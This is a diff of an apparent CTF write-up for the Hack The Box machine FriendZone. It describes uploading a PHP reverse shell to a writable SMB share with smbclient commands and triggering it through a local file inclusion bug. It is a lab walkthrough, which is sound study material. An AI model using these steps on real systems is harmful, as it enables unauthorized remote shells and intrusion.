h4md153v63n/CTFs/01_HTB/17_FriendZone.md

 ### pagename
 + Remember duration of the enumeration phase, we discovered the **Development** share with READ and WRITE permissions from SMB, and it's likely that the files uploaded on that share are stored in the location /etc/Development based on the **Comments** column.
-+ Try to upload a php revershell file, and then exploit the LFI vulnerability to get a reverse shell.
++ Try to upload a php revershell file to the target machine, and then exploit the LFI vulnerability to get a reverse shell.
++ Change the IP address and port number on a copy of **/usr/share/webshells/php/php-reverse-shell.php**.
-+ Log into the Development share: `smbclient -N //10.10.10.123/Development`
++ Login into the Development share: `smbclient -N //10.10.10.123/Development`
 + Transfer the **shell.php** file from the attack machine to the share: `put shell.php`
 + **Alternatively**, `smbclient -N //10.10.10.123/Development -c 'put shell.php'`
 + **Alternatively 2**, `smbclient -N //10.10.10.123/Development -c 'put php-reverse-shell.php shell.php'`